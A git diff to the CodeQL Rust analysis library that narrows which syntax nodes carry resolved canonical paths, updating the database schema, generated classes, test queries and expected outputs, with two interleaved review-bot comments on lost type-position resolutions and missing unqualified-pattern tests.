diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll index 0b4fa39cd84..8a236d3f322 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll @@ -630,7 +630,7 @@ module Synth { TGenericArg or TGenericArgList or TGenericParam or TGenericParamList or TItemList or TLabel or TLetElse or TLifetime or TMacroItems or TMacroStmts or TMatchArm or TMatchArmList or TMatchGuard or TMeta or TName or TNameRef or TParamBase or TParamList or - TPat or TPathSegment or TRecordExprField or TRecordExprFieldList or TRecordField or + TPat or TPath or TPathSegment or TRecordExprField or TRecordExprFieldList or TRecordField or TRecordPatField or TRecordPatFieldList or TRename or TResolvable or TRetType or TReturnTypeSyntax or TSourceFile or TStmt or TStmtList or TToken or TTokenTree or TTupleField or TTypeBound or TTypeBoundList or TTypeRef or TUseTree or TUseTreeList or @@ -721,7 +721,8 @@ module Synth { /** * INTERNAL: Do not use. */ - class TResolvable = TMethodCallExpr or TPath; + class TResolvable = + TMethodCallExpr or TPathExprBase or TPathPat or TRecordExpr or TRecordPat or TTupleStructPat; /** * INTERNAL: Do not use. @@ -1727,6 +1728,8 @@ module Synth { or result = convertPatFromRaw(e) or + result = convertPathFromRaw(e) + or result = convertPathSegmentFromRaw(e) or result = convertRecordExprFieldFromRaw(e) @@ -2067,7 +2070,15 @@ module Synth { TResolvable convertResolvableFromRaw(Raw::Element e) { result = convertMethodCallExprFromRaw(e) or - result = convertPathFromRaw(e) + result = convertPathExprBaseFromRaw(e) + or + result = convertPathPatFromRaw(e) + or + result = convertRecordExprFromRaw(e) + or + result = convertRecordPatFromRaw(e) + or + result = convertTupleStructPatFromRaw(e) } /** 
@@ -3111,6 +3122,8 @@ module Synth { or result = convertPatToRaw(e) or + result = convertPathToRaw(e) + or result = convertPathSegmentToRaw(e) or result = convertRecordExprFieldToRaw(e) @@ -3451,7 +3464,15 @@ module Synth { Raw::Element convertResolvableToRaw(TResolvable e) { result = convertMethodCallExprToRaw(e) or - result = convertPathToRaw(e) + result = convertPathExprBaseToRaw(e) + or + result = convertPathPatToRaw(e) + or + result = convertRecordExprToRaw(e) + or + result = convertRecordPatToRaw(e) + or + result = convertTupleStructPatToRaw(e) } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll index ed4e57d8719..9e57c0a9ad8 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll @@ -9,6 +9,7 @@ private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.Pat import codeql.rust.elements.internal.PatImpl::Impl as PatImpl import codeql.rust.elements.Path +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `TupleStructPat` and should not @@ -27,7 +28,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::TupleStructPat` class directly. * Use the subclass `TupleStructPat`, where the following predicates are available. */ - class TupleStructPat extends Synth::TTupleStructPat, PatImpl::Pat { + class TupleStructPat extends Synth::TTupleStructPat, PatImpl::Pat, ResolvableImpl::Resolvable { override string getAPrimaryQlClass() { result = "TupleStructPat" } /** diff --git a/rust/ql/lib/rust.dbscheme b/rust/ql/lib/rust.dbscheme index fe0f5bc436c..d63c6d62298 100644 --- a/rust/ql/lib/rust.dbscheme +++ b/rust/ql/lib/rust.dbscheme 
@@ -166,6 +166,7 @@ locatable_locations( | @param_base | @param_list | @pat +| @path | @path_segment | @record_expr_field | @record_expr_field_list @@ -652,6 +653,22 @@ param_list_self_params( | @wildcard_pat ; +paths( + unique int id: @path +); + +#keyset[id] +path_qualifiers( + int id: @path ref, + int qualifier: @path ref +); + +#keyset[id] +path_parts( + int id: @path ref, + int part: @path_segment ref +); + path_segments( unique int id: @path_segment ); @@ -826,7 +843,11 @@ rename_names( @resolvable = @method_call_expr -| @path +| @path_expr_base +| @path_pat +| @record_expr +| @record_pat +| @tuple_struct_pat ; #keyset[id] @@ -1963,22 +1984,6 @@ paren_type_ties( int ty: @type_ref ref ); -paths( - unique int id: @path -); - -#keyset[id] -path_qualifiers( - int id: @path ref, - int qualifier: @path ref -); - -#keyset[id] -path_parts( - int id: @path ref, - int part: @path_segment ref -); - @path_expr_base = @path_expr ; diff --git a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected index 0b973174828..09583dcf9f6 100644 --- a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected +++ b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected 
@@ -34,34 +34,15 @@ canonicalPaths | regular.rs:40:1:46:1 | fn enum_qualified_usage | repo::test | crate::regular::enum_qualified_usage | | regular.rs:48:1:55:1 | fn enum_unqualified_usage | repo::test | crate::regular::enum_unqualified_usage | | regular.rs:51:5:51:18 | Use | None | None | +| regular.rs:57:1:63:1 | fn enum_match | repo::test | crate::regular::enum_match | resolvedPaths -| anonymous.rs:1:5:1:9 | super | None | None | -| anonymous.rs:1:5:1:18 | ...::regular | repo::test | crate::regular | -| anonymous.rs:1:5:1:25 | ...::Trait | repo::test | crate::regular::Trait | -| anonymous.rs:10:10:10:19 | OtherTrait | repo::test | {0}::OtherTrait | -| anonymous.rs:10:25:10:35 | OtherStruct | repo::test | {0}::OtherStruct | -| anonymous.rs:14:10:14:19 | OtherTrait | repo::test | {0}::OtherTrait | -| anonymous.rs:14:25:14:29 | crate | None | None | -| anonymous.rs:14:25:14:38 | ...::regular | repo::test | crate::regular | -| anonymous.rs:14:25:14:46 | ...::Struct | repo::test | crate::regular::Struct | -| anonymous.rs:18:10:18:14 | crate | None | None | -| anonymous.rs:18:10:18:23 | ...::regular | repo::test | crate::regular | -| anonymous.rs:18:10:18:30 | ...::Trait | repo::test | crate::regular::Trait | -| anonymous.rs:18:36:18:46 | OtherStruct | repo::test | {0}::OtherStruct | -| anonymous.rs:27:17:27:27 | OtherStruct | repo::test | {0}::OtherStruct | +| anonymous.rs:27:17:27:30 | OtherStruct {...} | repo::test | {0}::OtherStruct | | anonymous.rs:28:9:28:9 | s | None | None | | anonymous.rs:28:9:28:13 | ... .f(...) | repo::test | <{0}::OtherStruct as crate::regular::Trait>::f | | anonymous.rs:29:9:29:9 | s | None | None | | anonymous.rs:29:9:29:13 | ... .g(...) 
| repo::test | <{0}::OtherStruct as {0}::OtherTrait>::g | | anonymous.rs:30:9:30:14 | nested | repo::test | {0}::nested | -| regular.rs:1:3:1:8 | derive | None | None | -| regular.rs:8:6:8:10 | Trait | repo::test | crate::regular::Trait | -| regular.rs:8:16:8:21 | Struct | repo::test | crate::regular::Struct | -| regular.rs:12:6:12:11 | Struct | repo::test | crate::regular::Struct | -| regular.rs:20:9:20:10 | Eq | lang:core | crate::cmp::Eq | -| regular.rs:20:13:20:32 | TraitWithBlanketImpl | repo::test | crate::regular::TraitWithBlanketImpl | -| regular.rs:20:38:20:38 | T | None | None | -| regular.rs:27:13:27:18 | Struct | repo::test | crate::regular::Struct | +| regular.rs:27:13:27:21 | Struct {...} | repo::test | crate::regular::Struct | | regular.rs:28:5:28:5 | s | None | None | | regular.rs:28:5:28:9 | ... .f(...) | repo::test | ::f | | regular.rs:29:5:29:5 | s | None | None | 
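Review bot: The rows removed from `resolvedPaths` here include resolved type- and trait-position entries such as `regular.rs:20:9:20:10 | Eq | lang:core | crate::cmp::Eq`, and nothing in the new expectations replaces them. This follows from `TResolvable` in `Synth.qll` no longer containing `TPath`, so a path that is not under one of the listed expression or pattern nodes (presumably type references, trait bounds and `use` targets) has no `getResolvedPath()` any more, and a query that recognises a type or trait by its canonical path would quietly return nothing for it. If the loss is intended, state it where `Resolvable` is documented, e.g. `Paths in type position and in use declarations are not resolved.`; the second hunk of this file (`@@ -69,21 +50,17 @@`) drops the `Option` and `MyEnum` qualifier rows for the same reason.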
@@ -69,21 +50,17 @@ resolvedPaths | regular.rs:30:5:30:5 | s | None | None | | regular.rs:30:5:30:9 | ... .h(...) | repo::test | <_ as crate::regular::TraitWithBlanketImpl>::h | | regular.rs:31:5:31:8 | free | repo::test | crate::regular::free | -| regular.rs:36:14:36:18 | usize | None | None | -| regular.rs:37:19:37:23 | usize | None | None | -| regular.rs:41:9:41:14 | Option | lang:core | crate::option::Option | | regular.rs:41:9:41:26 | ...::None::<...> | lang:core | crate::option::Option::None | -| regular.rs:42:9:42:14 | Option | lang:core | crate::option::Option | | regular.rs:42:9:42:20 | ...::Some | lang:core | crate::option::Option::Some | -| regular.rs:43:9:43:14 | MyEnum | repo::test | crate::regular::MyEnum | | regular.rs:43:9:43:24 | ...::Variant1 | repo::test | crate::regular::MyEnum::Variant1 | -| regular.rs:44:9:44:14 | MyEnum | repo::test | crate::regular::MyEnum | | regular.rs:44:9:44:24 | ...::Variant2 | repo::test | crate::regular::MyEnum::Variant2 | -| regular.rs:45:9:45:14 | MyEnum | repo::test | crate::regular::MyEnum | -| regular.rs:45:9:45:24 | ...::Variant3 | repo::test | crate::regular::MyEnum::Variant3 | +| regular.rs:45:9:45:33 | ...::Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | | regular.rs:49:9:49:18 | None::<...> | lang:core | crate::option::Option::None | | regular.rs:50:9:50:12 | Some | lang:core | crate::option::Option::Some | -| regular.rs:51:9:51:14 | MyEnum | repo::test | crate::regular::MyEnum | | regular.rs:52:9:52:16 | Variant1 | repo::test | crate::regular::MyEnum::Variant1 | | regular.rs:53:9:53:16 | Variant2 | repo::test | crate::regular::MyEnum::Variant2 | -| regular.rs:54:9:54:16 | Variant3 | repo::test | crate::regular::MyEnum::Variant3 | +| regular.rs:54:9:54:25 | Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | +| regular.rs:58:11:58:11 | e | None | None | +| regular.rs:59:9:59:24 | ...::Variant1 | repo::test | crate::regular::MyEnum::Variant1 | +| regular.rs:60:9:60:27 | 
...::Variant2(...) | repo::test | crate::regular::MyEnum::Variant2 | +| regular.rs:61:9:61:31 | ...::Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | diff --git a/rust/ql/test/extractor-tests/canonical_path/regular.rs b/rust/ql/test/extractor-tests/canonical_path/regular.rs index ac06a12d24a..82b0525489f 100644 --- a/rust/ql/test/extractor-tests/canonical_path/regular.rs +++ b/rust/ql/test/extractor-tests/canonical_path/regular.rs @@ -53,3 +53,11 @@ fn enum_unqualified_usage() { _ = Variant2(0); _ = Variant3 { x: 1 }; } + +fn enum_match(e: MyEnum) { + match e { + MyEnum::Variant1 => {} + MyEnum::Variant2(_) => {} + MyEnum::Variant3 { .. } => {} + } +} diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected index df4fdad5c91..4f9a487e85d 100644 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected @@ -1,5 +1,5 @@ -| gen_format_args_expr.rs:9:20:9:20 | x | -| gen_format_args_expr.rs:9:25:9:25 | y | -| gen_format_argument.rs:5:22:5:26 | value | -| gen_format_argument.rs:5:29:5:33 | width | -| gen_format_argument.rs:5:36:5:44 | precision | +| gen_format_args_expr.rs:9:20:9:20 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_args_expr.rs:9:25:9:25 | y | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_argument.rs:5:22:5:26 | value | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_argument.rs:5:29:5:33 | width | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_argument.rs:5:36:5:44 | precision | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | 
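Review bot: `enum_match` only exercises qualified patterns (`MyEnum::Variant1`, `MyEnum::Variant2(_)`, `MyEnum::Variant3 { .. }`), while the expression tests come in both a qualified and an unqualified flavour. An unqualified unit variant in pattern position, with the variants imported the way `enum_unqualified_usage` does, deserves its own case: a bare name there is likely parsed as an identifier pattern rather than a `PathPat`, and would then fall outside the new `Resolvable` union without any test showing it. Consider a second function whose arms are `Variant1 => {}`, `Variant2(_) => {}` and `Variant3 { .. } => {}`, and record in `canonical_paths.expected` which of them resolve.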
diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql index 4f43ca11870..488207bc5bb 100644 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql @@ -2,6 +2,12 @@ import codeql.rust.elements import TestUtils -from FormatTemplateVariableAccess x -where toBeTested(x) and not x.isUnknown() -select x +from FormatTemplateVariableAccess x, string hasResolvedPath, string hasResolvedCrateOrigin +where + toBeTested(x) and + not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..8022e46e327 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from FormatTemplateVariableAccess x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() 
diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql new file mode 100644 index 00000000000..916fb7da09b --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from FormatTemplateVariableAccess x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/Path/Path.expected b/rust/ql/test/extractor-tests/generated/Path/Path.expected index dfc303c3293..21eeab9c7a3 100644 --- a/rust/ql/test/extractor-tests/generated/Path/Path.expected +++ b/rust/ql/test/extractor-tests/generated/Path/Path.expected 
@@ -1,26 +1,26 @@ -| gen_path.rs:5:9:5:18 | some_crate | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path.rs:5:9:5:31 | ...::some_module | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path.rs:5:9:5:42 | ...::some_item | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path.rs:6:5:6:7 | foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path.rs:6:5:6:12 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_expr.rs:5:13:5:20 | variable | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:6:13:6:15 | foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:6:13:6:20 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_expr.rs:7:13:7:15 | <...> | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:7:13:7:20 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_expr.rs:7:14:7:14 | T | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:7:14:7:14 | T | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:8:13:8:30 | <...> | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:8:13:8:35 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_expr.rs:8:14:8:20 | TypeRef | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no 
| hasPart: | yes | -| gen_path_expr.rs:8:14:8:20 | TypeRef | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_pat.rs:5:11:5:11 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_pat.rs:6:9:6:11 | Foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_pat.rs:6:9:6:16 | ...::Bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_type.rs:5:14:5:16 | std | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_type.rs:5:14:5:29 | ...::collections | hasResolvedPath: | yes | hasResolvedCrateOrigin: | yes | hasQualifier: | yes | hasPart: | yes | -| gen_path_type.rs:5:14:5:48 | ...::HashMap::<...> | hasResolvedPath: | yes | hasResolvedCrateOrigin: | yes | hasQualifier: | yes | hasPart: | yes | -| gen_path_type.rs:5:40:5:42 | i32 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_type.rs:5:45:5:47 | i32 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_type.rs:6:14:6:14 | X | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_type.rs:6:14:6:20 | ...::Item | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | +| gen_path.rs:5:9:5:18 | some_crate | hasQualifier: | no | hasPart: | yes | +| gen_path.rs:5:9:5:31 | ...::some_module | hasQualifier: | yes | hasPart: | yes | +| gen_path.rs:5:9:5:42 | ...::some_item | hasQualifier: | yes | hasPart: | yes | +| gen_path.rs:6:5:6:7 | foo | hasQualifier: | no | hasPart: | yes | +| gen_path.rs:6:5:6:12 | ...::bar | hasQualifier: | yes | hasPart: | yes | +| gen_path_expr.rs:5:13:5:20 | variable | hasQualifier: | no | hasPart: | yes | +| 
gen_path_expr.rs:6:13:6:15 | foo | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:6:13:6:20 | ...::bar | hasQualifier: | yes | hasPart: | yes | +| gen_path_expr.rs:7:13:7:15 | <...> | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:7:13:7:20 | ...::foo | hasQualifier: | yes | hasPart: | yes | +| gen_path_expr.rs:7:14:7:14 | T | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:7:14:7:14 | T | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:8:13:8:30 | <...> | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:8:13:8:35 | ...::foo | hasQualifier: | yes | hasPart: | yes | +| gen_path_expr.rs:8:14:8:20 | TypeRef | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:8:14:8:20 | TypeRef | hasQualifier: | no | hasPart: | yes | +| gen_path_pat.rs:5:11:5:11 | x | hasQualifier: | no | hasPart: | yes | +| gen_path_pat.rs:6:9:6:11 | Foo | hasQualifier: | no | hasPart: | yes | +| gen_path_pat.rs:6:9:6:16 | ...::Bar | hasQualifier: | yes | hasPart: | yes | +| gen_path_type.rs:5:14:5:16 | std | hasQualifier: | no | hasPart: | yes | +| gen_path_type.rs:5:14:5:29 | ...::collections | hasQualifier: | yes | hasPart: | yes | +| gen_path_type.rs:5:14:5:48 | ...::HashMap::<...> | hasQualifier: | yes | hasPart: | yes | +| gen_path_type.rs:5:40:5:42 | i32 | hasQualifier: | no | hasPart: | yes | +| gen_path_type.rs:5:45:5:47 | i32 | hasQualifier: | no | hasPart: | yes | +| gen_path_type.rs:6:14:6:14 | X | hasQualifier: | no | hasPart: | yes | +| gen_path_type.rs:6:14:6:20 | ...::Item | hasQualifier: | yes | hasPart: | yes | diff --git a/rust/ql/test/extractor-tests/generated/Path/Path.ql b/rust/ql/test/extractor-tests/generated/Path/Path.ql index d84c2d86987..c5e1ba9d78a 100644 --- a/rust/ql/test/extractor-tests/generated/Path/Path.ql +++ b/rust/ql/test/extractor-tests/generated/Path/Path.ql 
@@ -2,18 +2,10 @@ import codeql.rust.elements import TestUtils -from - Path x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasQualifier, string hasPart +from Path x, string hasQualifier, string hasPart where toBeTested(x) and not x.isUnknown() and - (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and - ( - if x.hasResolvedCrateOrigin() - then hasResolvedCrateOrigin = "yes" - else hasResolvedCrateOrigin = "no" - ) and (if x.hasQualifier() then hasQualifier = "yes" else hasQualifier = "no") and if x.hasPart() then hasPart = "yes" else hasPart = "no" -select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, - "hasQualifier:", hasQualifier, "hasPart:", hasPart +select x, "hasQualifier:", hasQualifier, "hasPart:", hasPart diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected b/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected index 4f6def5dd43..540ad015ddb 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected 
@@ -1,6 +1,6 @@ -| gen_path.rs:6:5:6:12 | ...::bar | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:5:13:5:20 | variable | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:6:13:6:20 | ...::bar | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:7:13:7:20 | ...::foo | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:8:13:8:35 | ...::foo | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_pat.rs:5:11:5:11 | x | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path.rs:6:5:6:12 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_expr.rs:5:13:5:20 | variable | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_expr.rs:6:13:6:20 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_expr.rs:7:13:7:20 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_expr.rs:8:13:8:35 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_pat.rs:5:11:5:11 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql b/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql index 4d472add336..62db075a1ac 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql 
@@ -2,10 +2,19 @@ import codeql.rust.elements import TestUtils -from PathExpr x, int getNumberOfAttrs, string hasPath +from + PathExpr x, string hasResolvedPath, string hasResolvedCrateOrigin, int getNumberOfAttrs, + string hasPath where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and getNumberOfAttrs = x.getNumberOfAttrs() and if x.hasPath() then hasPath = "yes" else hasPath = "no" -select x, "getNumberOfAttrs:", getNumberOfAttrs, "hasPath:", hasPath +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "getNumberOfAttrs:", getNumberOfAttrs, "hasPath:", hasPath diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..24e07918484 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from PathExpr x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d 
diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql new file mode 100644 index 00000000000..10e6ceb2a0b --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from PathExpr x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/Path/PathPat.expected b/rust/ql/test/extractor-tests/generated/Path/PathPat.expected index 159f006eecb..cf90175a84c 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathPat.expected +++ b/rust/ql/test/extractor-tests/generated/Path/PathPat.expected @@ -1 +1 @@ -| gen_path_pat.rs:6:9:6:16 | ...::Bar | hasPath: | yes | +| gen_path_pat.rs:6:9:6:16 | ...::Bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | diff --git a/rust/ql/test/extractor-tests/generated/Path/PathPat.ql b/rust/ql/test/extractor-tests/generated/Path/PathPat.ql index 3e6cce8f151..a105c20c39e 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathPat.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathPat.ql @@ -2,9 +2,16 @@ import codeql.rust.elements import TestUtils -from PathPat x, string hasPath +from PathPat x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and if x.hasPath() then hasPath = "yes" else hasPath = "no" -select x, "hasPath:", hasPath +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "hasPath:", hasPath 
